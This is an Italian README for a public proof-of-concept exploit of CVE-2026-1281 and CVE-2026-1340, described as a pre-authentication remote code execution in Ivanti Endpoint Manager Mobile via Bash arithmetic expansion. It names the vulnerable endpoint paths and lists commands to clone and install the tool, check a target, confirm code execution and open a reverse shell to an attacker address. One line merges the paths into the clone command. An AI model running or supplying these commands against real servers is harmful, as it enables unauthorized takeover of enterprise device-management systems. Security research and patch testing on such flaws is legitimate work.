
Proof of Concept per CVE-2026-1281 e CVE-2026-1340 - Ivanti EPMM Pre-Auth RCE tramite Bash Arithmetic Expansion
⚠️ DISCLAIMER: Questo PoC è fornito esclusivamente a scopo educativo e di ricerca sulla sicurezza. L'utilizzo senza autorizzazione esplicita è illegale.
Proof of Concept (PoC) completo per lo sfruttamento delle vulnerabilità CVE-2026-1281 e CVE-2026-1340 che interessano Ivanti Endpoint Manager Mobile (EPMM). Queste vulnerabilità consentono l'esecuzione di codice arbitrario da remoto (RCE) senza autenticazione tramite un meccanismo di Bash Arithmetic Expansion.
/mifs/c/appstore/fob//mifs/c/aftstore/fob/git clone https://github.com/MehdiLeDeaut/CVE-2026-1281-Ivanti-EPMM-RCE.git
cd CVE-2026-1281-Ivanti-EPMM-RCE
pip3 install -r requirements.txt
chmod +x *.py
# Test di vulnerabilità
python3 exploit.py -t https://target.com -c
# Validazione RCE
python3 exploit.py -t https://target.com --test-rce
# Reverse shell
python3 exploit.py -t https://target.com --reverse-shell 10.10.14.5:4444
Mehdi Le Deaut - Consulente Cybersecurity | Specialista Red Team
Questo progetto è concesso in licenza MIT - vedere il file LICENSE per maggiori dettagli.